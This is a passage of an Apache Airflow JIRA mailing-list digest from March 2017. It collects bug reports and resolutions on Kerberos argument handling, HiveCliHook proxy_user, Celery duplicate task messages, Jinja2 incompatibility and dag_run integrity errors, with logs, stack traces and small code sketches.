[jira] [Updated] (AIRFLOW-986) HiveCliHook silently ignores 'proxy_user' in connection's extra parameters

2017-03-14 Thread Yi Wei (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-986?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Yi Wei updated AIRFLOW-986:
---
Affects Version/s: Airflow 2.0

> HiveCliHook silently ignores 'proxy_user' in connection's extra parameters
> --
>
> Key: AIRFLOW-986
> URL: https://issues.apache.org/jira/browse/AIRFLOW-986
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: hive_hooks
>Affects Versions: Airflow 2.0, Airflow 1.8, Airflow 1.7.1, Airflow 1.7.0, 
> Airflow 1.6.2, Airflow 1.7.1.2, Airflow 1.7.1.3
>Reporter: Yi Wei
>Assignee: Yi Wei
>Priority: Minor
>
> HiveCliHook simply ignores the value of the key 'proxy_user' in a connection's 
> extra parameters JSON object. There are two exceptions: if a user specifies 
> 'proxy_user' to be 'login' or 'owner', HiveCliHook will append 
> 'hive.server2.proxy.user' to the JDBC URL; otherwise the proxy_user value is 
> always ignored.





[jira] [Created] (AIRFLOW-987) `airflow kerberos` ignores --keytab and --principal arguments

2017-03-14 Thread Ruslan Dautkhanov (JIRA)
Ruslan Dautkhanov created AIRFLOW-987:
-

 Summary: `airflow kerberos` ignores --keytab and --principal 
arguments
 Key: AIRFLOW-987
 URL: https://issues.apache.org/jira/browse/AIRFLOW-987
 Project: Apache Airflow
  Issue Type: Bug
  Components: security
Affects Versions: Airflow 1.8
 Environment: 1.8-rc5
Reporter: Ruslan Dautkhanov


No matter which arguments I pass to `airflow kerberos`, 
it always executes as `kinit -r 3600m -k -t airflow.keytab -c 
/tmp/airflow_krb5_ccache airflow`

So it fails with the expected "kinit: Keytab contains no suitable keys for 
airf...@corp.some.com while getting initial credentials".

I tried different arguments, -kt and --keytab; here's one of the runs (some 
lines wrapped for readability):

{noformat}
$ airflow kerberos -kt /home/rdautkha/.keytab rdautkha...@corp.some.com
[2017-03-14 23:50:11,523] {__init__.py:57} INFO - Using executor LocalExecutor

[2017-03-14 23:50:12,069] {kerberos.py:43} INFO - Reinitting kerberos from 
keytab: 
kinit -r 3600m -k -t airflow.keytab -c /tmp/airflow_krb5_ccache airflow
[2017-03-14 23:50:12,080] {kerberos.py:55} ERROR -
 Couldn't reinit from keytab! `kinit' exited with 1.

kinit: Keytab contains no suitable keys for airf...@corp.some.com 
while getting initial credentials
{noformat}

1.8-rc5
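A minimal sketch of the plumbing one would expect here (function and config names are assumed for illustration, not the actual cli.py/kerberos.py code): the CLI arguments should take precedence over the [kerberos] section of airflow.cfg when the kinit command is built.

{code}
# Hypothetical sketch; argument and config names are assumed.
def build_kinit_cmd(args, conf):
    # CLI flags win; fall back to airflow.cfg [kerberos] settings otherwise.
    keytab = args.keytab or conf.get('kerberos', 'keytab')
    principal = args.principal or conf.get('kerberos', 'principal')
    ccache = conf.get('kerberos', 'ccache')
    return ['kinit', '-r', '3600m', '-k', '-t', keytab, '-c', ccache, principal]
{code}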





[jira] [Created] (AIRFLOW-986) HiveCliHook silently ignores 'proxy_user' in connection's extra parameters

2017-03-14 Thread Yi Wei (JIRA)
Yi Wei created AIRFLOW-986:
--

 Summary: HiveCliHook silently ignores 'proxy_user' in connection's 
extra parameters
 Key: AIRFLOW-986
 URL: https://issues.apache.org/jira/browse/AIRFLOW-986
 Project: Apache Airflow
  Issue Type: Bug
  Components: hive_hooks
Affects Versions: Airflow 1.8, Airflow 1.7.1, Airflow 1.7.0, Airflow 1.6.2, 
Airflow 1.7.1.2, Airflow 1.7.1.3
Reporter: Yi Wei
Assignee: Yi Wei
Priority: Minor


HiveCliHook simply ignores the value of the key 'proxy_user' in a connection's 
extra parameters JSON object. There are two exceptions: if a user specifies 
'proxy_user' to be 'login' or 'owner', HiveCliHook will append 
'hive.server2.proxy.user' to the JDBC URL; otherwise the proxy_user value is 
always ignored.
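A minimal sketch of the behaviour the report asks for (helper name and extra-JSON shape are assumptions, not the actual HiveCliHook code): an arbitrary 'proxy_user' value would be passed through to hive.server2.proxy.user instead of only 'login' and 'owner' being honoured.

{code}
# Hypothetical helper, not the hook's real implementation.
import json

def proxy_user_value(extra_json, login, owner):
    extra = json.loads(extra_json or '{}')
    proxy = extra.get('proxy_user')
    if proxy == 'login':
        return 'hive.server2.proxy.user={}'.format(login)
    if proxy == 'owner':
        return 'hive.server2.proxy.user={}'.format(owner)
    if proxy:  # currently dropped; pass the literal value through instead
        return 'hive.server2.proxy.user={}'.format(proxy)
    return None

print(proxy_user_value('{"proxy_user": "etl_svc"}', 'airflow', 'alice'))
# hive.server2.proxy.user=etl_svc
{code}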





[jira] [Resolved] (AIRFLOW-736) Sub dag status still "running" even if all task instances are complete

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-736?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-736.

Resolution: Cannot Reproduce

> Sub dag status still "running" even if all task instances are complete
> --
>
> Key: AIRFLOW-736
> URL: https://issues.apache.org/jira/browse/AIRFLOW-736
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: scheduler
>Affects Versions: Airflow 1.7.1.3
>Reporter: Shreyas Joshi
>
> Sometimes a sub dag is still running even though all the task instances in 
> it are successful. The log is an endless repetition of waiting for the tasks 
> to finish, like:
> {noformat}
> [2017-01-05 00:46:26,031] {jobs.py:997} INFO - [backfill progress] | waiting: 
> 1 | succeeded: 6 | kicked_off: 7 | failed: 0 | skipped: 4 | deadlocked: 0
> [2017-01-05 00:46:31,033] {jobs.py:997} INFO - [backfill progress] | waiting: 
> 1 | succeeded: 6 | kicked_off: 7 | failed: 0 | skipped: 4 | deadlocked: 0
> {noformat}
> with this line hidden in there:
> {noformat}
> [2017-01-05 00:10:21,037] {jobs.py:965} ERROR - The airflow run command failed 
> at reporting an error. This should not occur in normal circumstances. Task 
> state is 'running', reported state is 'success'. TI is <TaskInstance: 
> something.something_child 2017-01-03 23:00:00 [running]>
> {noformat}
> There are no dependencies on past runs. We are using the CeleryExecutor with 
> three worker nodes. AIRFLOW-396 seems very similar to this.





[jira] [Created] (AIRFLOW-985) Extend the sqoop operator/hook with additional parameters

2017-03-14 Thread Fokko Driesprong (JIRA)
Fokko Driesprong created AIRFLOW-985:


 Summary: Extend the sqoop operator/hook with additional parameters
 Key: AIRFLOW-985
 URL: https://issues.apache.org/jira/browse/AIRFLOW-985
 Project: Apache Airflow
  Issue Type: Bug
Reporter: Fokko Driesprong


The current implementation of the sqoop hook/operator is rather bare-bones. 
For example, when exporting from HDFS to an RDBMS, quite a few parameters are 
missing; e.g. it is not possible to set the format of the null values.

Also, some arguments can be extended; for example, the current implementation 
does not support reading Parquet.

Besides that, tests need to be added to ensure proper behaviour.





[jira] [Resolved] (AIRFLOW-744) incompatibility notice for 1.7.3 and note on how to fix it

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-744?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-744.

Resolution: Fixed

> incompatibility notice for 1.7.3 and note on how to fix it
> --
>
> Key: AIRFLOW-744
> URL: https://issues.apache.org/jira/browse/AIRFLOW-744
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: docs, webserver
>Reporter: Jayesh
>Priority: Minor
>
> Since Airflow 1.7.3 has some compatibility issues with Jinja2 (2.9.2), it 
> has been breaking for a lot of people. 
> We therefore suggest putting a notice on the website about this version, 
> along with a note on how to fix it (most likely only downgrading to Jinja2 
> 2.8.1 is required).
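The workaround described above, expressed as a pip pin (exact pin syntax assumed):

{noformat}
$ pip install 'Jinja2==2.8.1'
{noformat}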





[jira] [Resolved] (AIRFLOW-740) jinja2 2.9 seems incompatible with current airflow

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-740?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-740.

   Resolution: Fixed
Fix Version/s: 1.8.0

> jinja2 2.9 seems incompatible with current airflow
> --
>
> Key: AIRFLOW-740
> URL: https://issues.apache.org/jira/browse/AIRFLOW-740
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>
> {code}
> ==
> ERROR: test_dag_views (tests.WebUiTests)
> --
> Traceback (most recent call last):
>   File "/home/travis/build/apache/incubator-airflow/tests/core.py", line 
> 1423, in test_dag_views
> '/admin/airflow/graph?dag_id=example_bash_operator')
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/werkzeug/test.py",
>  line 778, in get
> return self.open(*args, **kw)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/testing.py",
>  line 127, in open
> follow_redirects=follow_redirects)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/werkzeug/test.py",
>  line 751, in open
> response = self.run_wsgi_app(environ, buffered=buffered)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/werkzeug/test.py",
>  line 668, in run_wsgi_app
> rv = run_wsgi_app(self.application, environ, buffered=buffered)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/werkzeug/test.py",
>  line 871, in run_wsgi_app
> app_rv = app(environ, start_response)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1994, in __call__
> return self.wsgi_app(environ, start_response)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1985, in wsgi_app
> response = self.handle_exception(e)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1540, in handle_exception
> reraise(exc_type, exc_value, tb)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1982, in wsgi_app
> response = self.full_dispatch_request()
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1614, in full_dispatch_request
> rv = self.handle_user_exception(e)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1517, in handle_user_exception
> reraise(exc_type, exc_value, tb)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1612, in full_dispatch_request
> rv = self.dispatch_request()
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask/app.py",
>  line 1598, in dispatch_request
> return self.view_functions[rule.endpoint](**req.view_args)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask_admin/base.py",
>  line 69, in inner
> return self._run_view(f, *args, **kwargs)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask_admin/base.py",
>  line 368, in _run_view
> return fn(self, *args, **kwargs)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask_login.py",
>  line 755, in decorated_view
> return func(*args, **kwargs)
>   File "/home/travis/build/apache/incubator-airflow/airflow/www/utils.py", 
> line 221, in view_func
> return f(*args, **kwargs)
>   File "/home/travis/build/apache/incubator-airflow/airflow/www/utils.py", 
> line 125, in wrapper
> return f(*args, **kwargs)
>   File "/home/travis/build/apache/incubator-airflow/airflow/www/views.py", 
> line 1438, in graph
> edges=json.dumps(edges, indent=2),)
>   File 
> "/home/travis/build/apache/incubator-airflow/.tox/py27-cdh-airflow_backend_sqlite/lib/python2.7/site-packages/flask_admin/base.py",
>  line 308, in 

[jira] [Resolved] (AIRFLOW-755) trigger dag test overflows datetime.hour

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-755?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-755.

Resolution: Fixed

> trigger dag test overflows datetime.hour
> 
>
> Key: AIRFLOW-755
> URL: https://issues.apache.org/jira/browse/AIRFLOW-755
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
>
> datetime.hour has a range of 0-23. The trigger dag test uses now.hour + 1, 
> which can overflow to 24.
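A self-contained illustration of the failure mode (the test's exact code is assumed): bumping the hour field directly breaks at 23:xx, while adding a timedelta rolls over safely.

{code}
from datetime import datetime, timedelta

now = datetime(2017, 1, 25, 23, 30)
# now.replace(hour=now.hour + 1)   # ValueError: hour must be in 0..23
print(now + timedelta(hours=1))    # 2017-01-26 00:30:00 - rolls over safely
{code}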





[jira] [Updated] (AIRFLOW-756) Refactor ssh_hook and ssh_operator

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-756?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin updated AIRFLOW-756:
---
Fix Version/s: 1.9.0

> Refactor ssh_hook and ssh_operator
> --
>
> Key: AIRFLOW-756
> URL: https://issues.apache.org/jira/browse/AIRFLOW-756
> Project: Apache Airflow
>  Issue Type: Improvement
>  Components: hooks, operators
>Reporter: Michael Gonzalez
>Assignee: Jayesh
>Priority: Minor
> Fix For: 1.9.0
>
>






[jira] [Resolved] (AIRFLOW-757) Set sensible location for processor logs

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-757?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-757.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Set sensible location for processor logs
> 
>
> Key: AIRFLOW-757
> URL: https://issues.apache.org/jira/browse/AIRFLOW-757
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>
> The current default location for processor logs is /tmp/airflow, which is 
> outside all of the standard locations and could surprise people. It should 
> default to ~/airflow/logs/processor.





[jira] [Commented] (AIRFLOW-928) Same {task,execution_date} run multiple times in worker when using CeleryExecutor

2017-03-14 Thread Alex Guziel (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-928?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15925006#comment-15925006
 ] 

Alex Guziel commented on AIRFLOW-928:
-

[~bolke] I did see a double trigger one hour later; I will see if it's related.

> Same {task,execution_date} run multiple times in worker when using 
> CeleryExecutor
> -
>
> Key: AIRFLOW-928
> URL: https://issues.apache.org/jira/browse/AIRFLOW-928
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: celery
>Affects Versions: Airflow 1.7.1.3
> Environment: Docker
>Reporter: Uri Shamay
> Attachments: airflow.log, dag_runs.png, dummy_dag.py, processes.list, 
> rabbitmq.queue, scheduler.log, worker_2.log, worker.log
>
>
> Hi,
> When using Airflow with the CeleryExecutor (I tested both RabbitMQ and 
> Redis), I see that while workers are down, the scheduler repeatedly 
> **appends** the same {task,execution_date} message to the broker, which 
> means that if workers are down or can't connect to the broker for a few 
> hours, the broker ends up holding thousands of copies of the same executions.
> In my scenario I have just one dummy dag to run, with dag_concurrency of 4. 
> I expected the broker to hold just 4 messages, and the scheduler not to 
> queue copy after copy for the same {task,execution_date}.
> What happens is that when the workers start consuming, they get thousands of 
> messages for just 4 tasks, and when they try to write the task_instances to 
> the database there are integrity errors because those {task,execution_date} 
> rows already exist.
> Note that in my test, after letting Airflow schedule the work of just one 
> dag with no workers for a few hours, I connected to the broker with a custom 
> client and retrieved the messages - there were thousands of copies of the 
> same {dag,execution_date}.
> Even if only one instance actually runs when thousands of messages are 
> polled for the same key, it's still bad behavior: it would be better to 
> produce one message per key, and on a timeout (like visibility) to set the 
> key rather than append to it. 
> When workers are down for a long time and many jobs are scheduled each 
> minute, the workers that come back get thousands of identical jobs => the 
> worker runs the same dags many times => many wasted Python runners => all 
> celery worker threads/processes are utilized => all other jobs starve until 
> the worker figures out that only one instance per key is needed.
> Attached files:
> 1. airflow.log - the task log; you can see several processes for the same 
> {task,execution_date} writing to the same log file.
> 2. worker.log - the worker log; you can see the worker trying to run the 
> same {task,execution_date} multiple times, plus the database integrity 
> errors saying those tasks on those dates already exist.
> 3. scheduler.log - shows the scheduler deciding to send the same 
> {job,execution_date} again and again, indefinitely.
> 4. dummy_dag.py - the dag used for the test.
> 5. rabbitmq.queue - shows that after 5 minutes the broker queue contains 40 
> messages for the same 4 {job,execution_date} keys.
> 6. dag_runs.png - shows that only 4 jobs need to run, while there are many 
> more messages in the queue.
> 7. processes.list - shows that after starting a worker, `ps -ef | grep 
> "airflow run"` lists the same {job,execution_date} running multiple times.
> 8. worker_2.log - shows the same {job,execution_date} keys appearing 
> multiple times when the worker starts.
> Thanks.
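A self-contained sketch of the behaviour proposed in the report (the broker is simulated with a dict; this is neither Celery nor Airflow code): set one message per {task,execution_date} key instead of appending another copy on every scheduler pass.

{code}
queued = {}

def enqueue(task_id, execution_date, payload):
    key = (task_id, execution_date)
    if key in queued:
        return False  # a message for this key is already pending
    queued[key] = payload
    return True

print(enqueue('dummy_task', '2017-03-14T00:00:00', 'attempt 1'))  # True
print(enqueue('dummy_task', '2017-03-14T00:00:00', 'attempt 2'))  # False
{code}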





[jira] [Resolved] (AIRFLOW-760) Update systemd scripts

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-760?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-760.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Update systemd scripts 
> ---
>
> Key: AIRFLOW-760
> URL: https://issues.apache.org/jira/browse/AIRFLOW-760
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>
> systemd scripts are not compatible with 1.8





[jira] [Resolved] (AIRFLOW-759) The dependency checker should verify if the interval is the first interval after start_date

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-759?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-759.

   Resolution: Fixed
Fix Version/s: 1.8.0

> The dependency checker should verify if the interval is the first interval 
> after start_date 
> 
>
> Key: AIRFLOW-759
> URL: https://issues.apache.org/jira/browse/AIRFLOW-759
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>
> Since 1.8 we support auto-aligned start_date and interval. This is not 
> reflected in the dependency checker, and as such depends_on_past tasks will 
> fail if the start_date and the execution_date are not aligned.
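A minimal sketch of the alignment check (the helper shape is assumed, not the actual dep checker): depends_on_past would be waived for the first interval at or after start_date, even when start_date is not aligned to the schedule.

{code}
from datetime import datetime, timedelta

def is_first_interval(execution_date, start_date, interval):
    # True when no earlier run can exist between start_date and this run.
    return execution_date - interval < start_date

start = datetime(2017, 1, 1, 6, 30)   # start_date not aligned to midnight
daily = timedelta(days=1)
print(is_first_interval(datetime(2017, 1, 2), start, daily))  # True
print(is_first_interval(datetime(2017, 1, 3), start, daily))  # False
{code}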





[jira] [Resolved] (AIRFLOW-779) Task should fail with specific message if task instance is deleted

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-779?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-779.

   Resolution: Fixed
Fix Version/s: 1.8.0

> Task should fail with specific message if task instance is deleted
> --
>
> Key: AIRFLOW-779
> URL: https://issues.apache.org/jira/browse/AIRFLOW-779
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Alex Guziel
>Assignee: Alex Guziel
>Priority: Trivial
> Fix For: 1.8.0
>
>
> Right now, when a task instance is deleted from the DB (as it can be from 
> the UI task instances page), the task will fail when the state field is 
> accessed on a None object. We should handle this explicitly and give a 
> clear message.
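A minimal sketch of the explicit handling (exception type and helper name are assumptions, not the merged fix): raise a clear error instead of letting an attribute access on None blow up.

{code}
class AirflowException(Exception):  # stand-in for illustration
    pass

def state_of(ti):
    if ti is None:
        raise AirflowException(
            'Task instance was deleted from the database; failing the task.')
    return ti.state

try:
    state_of(None)
except AirflowException as e:
    print(e)
{code}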





[jira] [Resolved] (AIRFLOW-789) Update UPDATING.md for Airflow 1.8

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-789?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-789.

Resolution: Fixed

> Update UPDATING.md for Airflow 1.8
> --
>
> Key: AIRFLOW-789
> URL: https://issues.apache.org/jira/browse/AIRFLOW-789
> Project: Apache Airflow
>  Issue Type: Task
>  Components: hive_hooks
>Reporter: Bolke de Bruin
> Fix For: 1.8.0
>
>
> * scheduler config changes
> * airflow.ctx to hive config





[jira] [Issue Comment Deleted] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ruslan Dautkhanov updated AIRFLOW-980:
--
Comment: was deleted

(was: It seems the database schema changed from 1.7 to 1.8: "column 
task_instance.pid does not exist"
Is there a documented way to upgrade the database to the new schema?)

> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution), 
> I started seeing the error stack below again and again in the scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': 

[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924988#comment-15924988
 ] 

Ruslan Dautkhanov commented on AIRFLOW-980:
---

`airflow upgradedb` solved the "column task_instance.pid does not exist" error 
I reported earlier. Airflow rocks!
I am going to remove my two previous comments as they aren't related to this 
jira.
Thanks.

> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution), 
> I started seeing the error stack below again and again in the scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
